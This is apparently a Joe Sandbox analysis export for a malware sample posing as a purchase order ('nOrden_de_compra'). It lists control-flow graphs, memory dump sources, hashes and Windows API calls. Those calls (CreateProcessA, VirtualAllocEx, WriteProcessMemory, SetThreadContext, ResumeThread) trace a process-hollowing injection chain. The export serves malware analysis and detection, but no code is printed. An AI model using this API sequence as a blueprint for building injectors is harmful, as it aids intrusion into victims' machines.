                                          control_flow_graph 155 71e5834-71e58d5 158 71e590e-71e592e 155->158 159 71e58d7-71e58e1 155->159 164 71e5967-71e5996 158->164 165 71e5930-71e593a 158->165 159->158 160 71e58e3-71e58e5 159->160 161 71e5908-71e590b 160->161 162 71e58e7-71e58f1 160->162 161->158 166 71e58f5-71e5904 162->166 167 71e58f3 162->167 175 71e59cf-71e5a89 CreateProcessA 164->175 176 71e5998-71e59a2 164->176 165->164 168 71e593c-71e593e 165->168 166->166 169 71e5906 166->169 167->166 170 71e5940-71e594a 168->170 171 71e5961-71e5964 168->171 169->161 173 71e594e-71e595d 170->173 174 71e594c 170->174 171->164 173->173 177 71e595f 173->177 174->173 187 71e5a8b-71e5a91 175->187 188 71e5a92-71e5b18 175->188 176->175 178 71e59a4-71e59a6 176->178 177->171 180 71e59a8-71e59b2 178->180 181 71e59c9-71e59cc 178->181 182 71e59b6-71e59c5 180->182 183 71e59b4 180->183 181->175 182->182 185 71e59c7 182->185 183->182 185->181 187->188 198 71e5b1a-71e5b1e 188->198 199 71e5b28-71e5b2c 188->199 198->199 200 71e5b20 198->200 201 71e5b2e-71e5b32 199->201 202 71e5b3c-71e5b40 199->202 200->199 201->202 205 71e5b34 201->205 203 71e5b42-71e5b46 202->203 204 71e5b50-71e5b54 202->204 203->204 206 71e5b48 203->206 207 71e5b66-71e5b6d 204->207 208 71e5b56-71e5b5c 204->208 205->202 206->204 209 71e5b6f-71e5b7e 207->209 210 71e5b84 207->210 208->207 209->210 212 71e5b85 210->212 212->212
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E5A76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: e0536605489b7f5de3d81d973a8424a72c4197caf7ac9378f9923b2fb433b865
                                          • Instruction ID: ce89960646756d94783ed2c5bb373d8be085f37e5b1aba219f2ae84a95ebd66c
                                          • Opcode Fuzzy Hash: e0536605489b7f5de3d81d973a8424a72c4197caf7ac9378f9923b2fb433b865
                                          • Instruction Fuzzy Hash: 0FA15BB1D0061ACFEB11CF68CC417EDBBB6BF48314F148169E849A7280DB759A95CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 213 71e5840-71e58d5 215 71e590e-71e592e 213->215 216 71e58d7-71e58e1 213->216 221 71e5967-71e5996 215->221 222 71e5930-71e593a 215->222 216->215 217 71e58e3-71e58e5 216->217 218 71e5908-71e590b 217->218 219 71e58e7-71e58f1 217->219 218->215 223 71e58f5-71e5904 219->223 224 71e58f3 219->224 232 71e59cf-71e5a89 CreateProcessA 221->232 233 71e5998-71e59a2 221->233 222->221 225 71e593c-71e593e 222->225 223->223 226 71e5906 223->226 224->223 227 71e5940-71e594a 225->227 228 71e5961-71e5964 225->228 226->218 230 71e594e-71e595d 227->230 231 71e594c 227->231 228->221 230->230 234 71e595f 230->234 231->230 244 71e5a8b-71e5a91 232->244 245 71e5a92-71e5b18 232->245 233->232 235 71e59a4-71e59a6 233->235 234->228 237 71e59a8-71e59b2 235->237 238 71e59c9-71e59cc 235->238 239 71e59b6-71e59c5 237->239 240 71e59b4 237->240 238->232 239->239 242 71e59c7 239->242 240->239 242->238 244->245 255 71e5b1a-71e5b1e 245->255 256 71e5b28-71e5b2c 245->256 255->256 257 71e5b20 255->257 258 71e5b2e-71e5b32 256->258 259 71e5b3c-71e5b40 256->259 257->256 258->259 262 71e5b34 258->262 260 71e5b42-71e5b46 259->260 261 71e5b50-71e5b54 259->261 260->261 263 71e5b48 260->263 264 71e5b66-71e5b6d 261->264 265 71e5b56-71e5b5c 261->265 262->259 263->261 266 71e5b6f-71e5b7e 264->266 267 71e5b84 264->267 265->264 266->267 269 71e5b85 267->269 269->269
                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E5A76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: b78d79bb5f4d4374c3accb009027660abe82132086ed395da0a1b47fc7ad227b
                                          • Instruction ID: 85cd65212710b7114b57726b9cf45a252421cb27431e227e234c594e8c593158
                                          • Opcode Fuzzy Hash: b78d79bb5f4d4374c3accb009027660abe82132086ed395da0a1b47fc7ad227b
                                          • Instruction Fuzzy Hash: 2C915BB1D0061ACFEB15CF68CC417EDBBB6BF48314F148169E849A7280DB749A95CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 270 50ead68-50ead77 271 50ead79-50ead86 call 50ea08c 270->271 272 50eada3-50eada7 270->272 278 50ead9c 271->278 279 50ead88 271->279 274 50eadbb-50eadfc 272->274 275 50eada9-50eadb3 272->275 281 50eadfe-50eae06 274->281 282 50eae09-50eae17 274->282 275->274 278->272 328 50ead8e call 50eb000 279->328 329 50ead8e call 50eaff1 279->329 281->282 283 50eae3b-50eae3d 282->283 284 50eae19-50eae1e 282->284 289 50eae40-50eae47 283->289 286 50eae29 284->286 287 50eae20-50eae27 call 50ea098 284->287 285 50ead94-50ead96 285->278 288 50eaed8-50eaeef 285->288 291 50eae2b-50eae39 286->291 287->291 303 50eaef1-50eaf50 288->303 292 50eae49-50eae51 289->292 293 50eae54-50eae5b 289->293 291->289 292->293 296 50eae5d-50eae65 293->296 297 50eae68-50eae6a call 50ea0a8 293->297 296->297 299 50eae6f-50eae71 297->299 301 50eae7e-50eae83 299->301 302 50eae73-50eae7b 299->302 304 50eae85-50eae8c 301->304 305 50eaea1-50eaeae 301->305 302->301 321 50eaf52-50eaf98 303->321 304->305 306 50eae8e-50eae9e call 50ea0b8 call 50ea0c8 304->306 312 50eaeb0-50eaece 305->312 313 50eaed1-50eaed7 305->313 306->305 312->313 323 50eaf9a-50eaf9d 321->323 324 50eafa0-50eafcb GetModuleHandleW 321->324 323->324 325 50eafcd-50eafd3 324->325 326 50eafd4-50eafe8 324->326 325->326 328->285 329->285
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 050EAFBE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: ff84f1f11f85d0d125ebf99e4c9db609e1bb8ed68b2dd1c93c6cc13ecf23145f
                                          • Instruction ID: 2b94ee8265c28a2adb554dae0aa58851e73bf4a19e5995b0c0726e42806fb4fa
                                          • Opcode Fuzzy Hash: ff84f1f11f85d0d125ebf99e4c9db609e1bb8ed68b2dd1c93c6cc13ecf23145f
                                          • Instruction Fuzzy Hash: 3E711470A00B058FD764DF6AE44976ABBF6BF88304F10892DD486D7B50DB75E849CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 330 50e590c-50e5913 331 50e5918-50e59d9 CreateActCtxA 330->331 333 50e59db-50e59e1 331->333 334 50e59e2-50e5a3c 331->334 333->334 341 50e5a3e-50e5a41 334->341 342 50e5a4b-50e5a4f 334->342 341->342 343 50e5a60 342->343 344 50e5a51-50e5a5d 342->344 346 50e5a61 343->346 344->343 346->346
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 050E59C9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 30d7ac5564a2e7ff59d5e4e1f8bca620ab8f3f28ee2ae3bca7c1f50f8e1d7b88
                                          • Instruction ID: f3e7369a9d9c7f2cd5102e1a0ccc9342b7d11de235d2ad76eec313ddda780118
                                          • Opcode Fuzzy Hash: 30d7ac5564a2e7ff59d5e4e1f8bca620ab8f3f28ee2ae3bca7c1f50f8e1d7b88
                                          • Instruction Fuzzy Hash: DC41DDB0C0061DCBDB24CFA9C985BCEBBF6BF48704F24855AD408AB251DB756945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 347 50e44b4-50e59d9 CreateActCtxA 350 50e59db-50e59e1 347->350 351 50e59e2-50e5a3c 347->351 350->351 358 50e5a3e-50e5a41 351->358 359 50e5a4b-50e5a4f 351->359 358->359 360 50e5a60 359->360 361 50e5a51-50e5a5d 359->361 363 50e5a61 360->363 361->360 363->363
                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 050E59C9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 16cbd4e74e0f992a2bbbcf06ec60b39b5be429fa80c727ea39e38bdf0b4a9025
                                          • Instruction ID: 9a955e487ad3ae53c71e421e95717dee9d952599be692f78983eb604d9c09e80
                                          • Opcode Fuzzy Hash: 16cbd4e74e0f992a2bbbcf06ec60b39b5be429fa80c727ea39e38bdf0b4a9025
                                          • Instruction Fuzzy Hash: 1641DDB0C0061DCBDB24DFA9C985BCEBBF6BF48304F20856AD408AB251DBB56945CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 364 71e55b3-71e5606 367 71e5608-71e5614 364->367 368 71e5616-71e5655 WriteProcessMemory 364->368 367->368 370 71e565e-71e568e 368->370 371 71e5657-71e565d 368->371 371->370
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E5648
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 553aeab15fe4d7a06338400707644d3e6b7fcfce24bf70443b737b587bb6ff34
                                          • Instruction ID: c7635f84a2d6087cbae9def4c160974e8cbbf7fa36674c49782cb491f7701bbe
                                          • Opcode Fuzzy Hash: 553aeab15fe4d7a06338400707644d3e6b7fcfce24bf70443b737b587bb6ff34
                                          • Instruction Fuzzy Hash: 812148B59003099FDF10CFA9C981BDEBBF5FF48314F10842AE918A7240D7789954CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 375 71e55b8-71e5606 377 71e5608-71e5614 375->377 378 71e5616-71e5655 WriteProcessMemory 375->378 377->378 380 71e565e-71e568e 378->380 381 71e5657-71e565d 378->381 381->380
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E5648
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: aad3734c04fb0b0654cd23032def8e0e5bfbe3c05552f2be979d31900ecfae4a
                                          • Instruction ID: 7feba3f741bd0629fd53c9002717d5938b4cbb926d5cac9596478ca5c73fbf1c
                                          • Opcode Fuzzy Hash: aad3734c04fb0b0654cd23032def8e0e5bfbe3c05552f2be979d31900ecfae4a
                                          • Instruction Fuzzy Hash: C92127B59003599FDF10CFA9C981BDEBBF5FF48324F10842AE918A7240D7789954CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 385 71e4fe0-71e5033 388 71e5035-71e5041 385->388 389 71e5043-71e5073 Wow64SetThreadContext 385->389 388->389 391 71e507c-71e50ac 389->391 392 71e5075-71e507b 389->392 392->391
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E5066
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9b64df7a4941bd31a23e737c5aec68b6aff85755faa7ad521ffb9f4706bd431b
                                          • Instruction ID: f73ef4ff4fa5dae9a0555955e72613b630f5b77b0d8c6601a0a8305d7347d08e
                                          • Opcode Fuzzy Hash: 9b64df7a4941bd31a23e737c5aec68b6aff85755faa7ad521ffb9f4706bd431b
                                          • Instruction Fuzzy Hash: F7216AB19003098FDB10DFAAC8817EEBBF5FF48324F14842AE518A7240DB789944CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 396 71e56a0-71e5735 ReadProcessMemory 400 71e573e-71e576e 396->400 401 71e5737-71e573d 396->401 401->400
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E5728
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 770f6d14d92f10824caf4c48315998b14b0cb8ef2ed385209230d746a67e69db
                                          • Instruction ID: 1b5a4c5f3781ec952aa44212a24331d365280a9b21c060c45a9c84de9b7d08ff
                                          • Opcode Fuzzy Hash: 770f6d14d92f10824caf4c48315998b14b0cb8ef2ed385209230d746a67e69db
                                          • Instruction Fuzzy Hash: 052139B18003599FDF10CFAAC981BEEBBF5FF48320F50842AE558A7240C7789550CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 50ed23c-50ed6e4 DuplicateHandle 407 50ed6ed-50ed70a 405->407 408 50ed6e6-50ed6ec 405->408 408->407
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050ED616,?,?,?,?,?), ref: 050ED6D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 5bcb64e07a8ba935b2c5f9f565f38c50d507507132ad7bded6d5c2e3d361df58
                                          • Instruction ID: 5547879de7932992452775286f850e26b8bc911821796d61648b7e82e1099119
                                          • Opcode Fuzzy Hash: 5bcb64e07a8ba935b2c5f9f565f38c50d507507132ad7bded6d5c2e3d361df58
                                          • Instruction Fuzzy Hash: 1D21E5B5900249DFDB10CF9AD584ADEFBF5FB48320F14841AE919A7310D378A954CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 411 71e4fe8-71e5033 413 71e5035-71e5041 411->413 414 71e5043-71e5073 Wow64SetThreadContext 411->414 413->414 416 71e507c-71e50ac 414->416 417 71e5075-71e507b 414->417 417->416
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E5066
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: ffd5834710c10f9408ff376426bd390003f6030f8d9458c62f546b1c2a03cf47
                                          • Instruction ID: ed53f0b329736ec28b7877bbb10de82e9f116891a2929dc0bce0e8bfd1b2a36b
                                          • Opcode Fuzzy Hash: ffd5834710c10f9408ff376426bd390003f6030f8d9458c62f546b1c2a03cf47
                                          • Instruction Fuzzy Hash: AD2138B19003098FDB10DFAAC9857EEBBF5AF88324F148429E519A7240DB789944CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 421 71e56a8-71e5735 ReadProcessMemory 424 71e573e-71e576e 421->424 425 71e5737-71e573d 421->425 425->424
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E5728
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 3479e6fe8dc468fb9916a81d658cd54f98da3eb24ab33126f10b6f490354c97a
                                          • Instruction ID: 1ff149772416d32f2dbec106d25217e6509e56dca5ccbc01fd0c3ec5c0a00c6f
                                          • Opcode Fuzzy Hash: 3479e6fe8dc468fb9916a81d658cd54f98da3eb24ab33126f10b6f490354c97a
                                          • Instruction Fuzzy Hash: B32116B18003499FDB10DFAAC981ADEBBF5FF48320F508429E558A7240D7789510CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 429 50ed648-50ed6e4 DuplicateHandle 430 50ed6ed-50ed70a 429->430 431 50ed6e6-50ed6ec 429->431 431->430
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050ED616,?,?,?,?,?), ref: 050ED6D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 9647f787e7eb75b2b15e3160e892991f3c66512c0873b97b8b439f2f6a548e10
                                          • Instruction ID: 427e5f2ace4aac31dcb423953d99664cf2ab35d984a6ce9a1a004a4db6b0b949
                                          • Opcode Fuzzy Hash: 9647f787e7eb75b2b15e3160e892991f3c66512c0873b97b8b439f2f6a548e10
                                          • Instruction Fuzzy Hash: 9F21E0B69002499FDB10CFAAD584ADEBBF5FB48320F24841AE958A3310C378A954CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 434 71e54f0-71e5573 VirtualAllocEx 438 71e557c-71e55a1 434->438 439 71e5575-71e557b 434->439 439->438
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E5566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 4e8d52f3b3511d1f03a1439bb3212bfe56500b85e9091b18a5ae845fae4b1d1e
                                          • Instruction ID: c3860399ec3945f26ca3054c529149d9deb6bfc08d36e78def3360da5c4119b5
                                          • Opcode Fuzzy Hash: 4e8d52f3b3511d1f03a1439bb3212bfe56500b85e9091b18a5ae845fae4b1d1e
                                          • Instruction Fuzzy Hash: D8216A7680034A9FDB10DFA9C841BDEBBF5FF48724F108419E515A7240C7759550CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050EB039,00000800,00000000,00000000), ref: 050EB24A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 9f95a12bced52e1488ab179a8cc096975ee0c2040af9ba692391ca158b41df0f
                                          • Instruction ID: 144bdf4650e75f968adb0d4d987380f1d5061408f1f0abc0eaf9267db586f140
                                          • Opcode Fuzzy Hash: 9f95a12bced52e1488ab179a8cc096975ee0c2040af9ba692391ca158b41df0f
                                          • Instruction Fuzzy Hash: 461103B69042098FDB10CF9AD484A9EFBF5AF88320F10842EE519A7200C779A545CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050EB039,00000800,00000000,00000000), ref: 050EB24A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 5f0834b62f54c8bb400949a5a22eb8e56a322c8fdacb50c59811d595e4370a0c
                                          • Instruction ID: 143d30e4d508886a6b461424669bf091a9fde084b1698ba72cd9cbe95aba5e3c
                                          • Opcode Fuzzy Hash: 5f0834b62f54c8bb400949a5a22eb8e56a322c8fdacb50c59811d595e4370a0c
                                          • Instruction Fuzzy Hash: 621100B69042099FDB10CF9AD884BDEFBF5AF88320F10842AE519A7210C779A545CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E5566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 5e1e1195c4ceea74f9df5ea26b663da96aa31390699fab5899ec1c81b5bed87a
                                          • Instruction ID: 4fda2b5b98bf6db732206621af86b6f6d9f14bc739092215bcce60c2d8a40de2
                                          • Opcode Fuzzy Hash: 5e1e1195c4ceea74f9df5ea26b663da96aa31390699fab5899ec1c81b5bed87a
                                          • Instruction Fuzzy Hash: 141126728002499FDB10DFAAC945BDEBBF6AF88724F148419E619A7250CB75A550CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 038b51b7bc88e93c4dc8c8fb10b1888436d81531eed38dbd2b11cd83d32ea77b
                                          • Instruction ID: d485e42746482451e2f9a675e2a96188ac69328577f86f8ffa063bd4416bafad
                                          • Opcode Fuzzy Hash: 038b51b7bc88e93c4dc8c8fb10b1888436d81531eed38dbd2b11cd83d32ea77b
                                          • Instruction Fuzzy Hash: DA1146B58003498FDB20DFAAC5857EEFBF5EF88720F248419D519A7240CB79A945CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: dce5d5f9c0636b0573fdd546b9378e7f55641cac8f083999fa420ef9b8ef9df9
                                          • Instruction ID: 3e6d3fc0b01d233257b6a7ffb0328834f76cefec4f74c079391d693d6b8e90e3
                                          • Opcode Fuzzy Hash: dce5d5f9c0636b0573fdd546b9378e7f55641cac8f083999fa420ef9b8ef9df9
                                          • Instruction Fuzzy Hash: 41113AB19003498FDB20DFAAC94579EFBF5AF88724F248419D519A7240CB79A944CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071E9E1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: cb998eeb99b1295a7e090f9751a4eb192e0da27d7562b8622c25cfb4101ebe34
                                          • Instruction ID: 5cf48b999b4b626b6afac8a35ee13a4a207049a3870bc035825ff14425256183
                                          • Opcode Fuzzy Hash: cb998eeb99b1295a7e090f9751a4eb192e0da27d7562b8622c25cfb4101ebe34
                                          • Instruction Fuzzy Hash: D71102B58007499FCB20CF9AD485BDEFBF8FB48320F108459DA54A3600C374A554CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071E9E1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          • Opcode ID: 5d2b89e9b9404525765c7cf4673e6d3e94ed59e714f09f6ae54ebbb30ec3a7a7
                                          • Instruction ID: 01c1ff641f9429348d9658a68248d22833b37c0af5348e604141a182753c937b
                                          • Opcode Fuzzy Hash: 5d2b89e9b9404525765c7cf4673e6d3e94ed59e714f09f6ae54ebbb30ec3a7a7
                                          • Instruction Fuzzy Hash: B91125B58047499FCB10DF8AC584BDEBBF8FB48320F108459E519B7240C375A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 050EAFBE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7609302eabc1c0c3d26ad1ad719165f5c8a74bfd15153b5914bb3199806b1318
                                          • Instruction ID: b33aa2d6ba867624da979fe2fb1c7950d6e1ca38917fb2a131152d7163b6380c
                                          • Opcode Fuzzy Hash: 7609302eabc1c0c3d26ad1ad719165f5c8a74bfd15153b5914bb3199806b1318
                                          • Instruction Fuzzy Hash: 25110FB6D042498FCB10CF9AD444BDEFBF4AB88224F21842AD419A7600C379A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
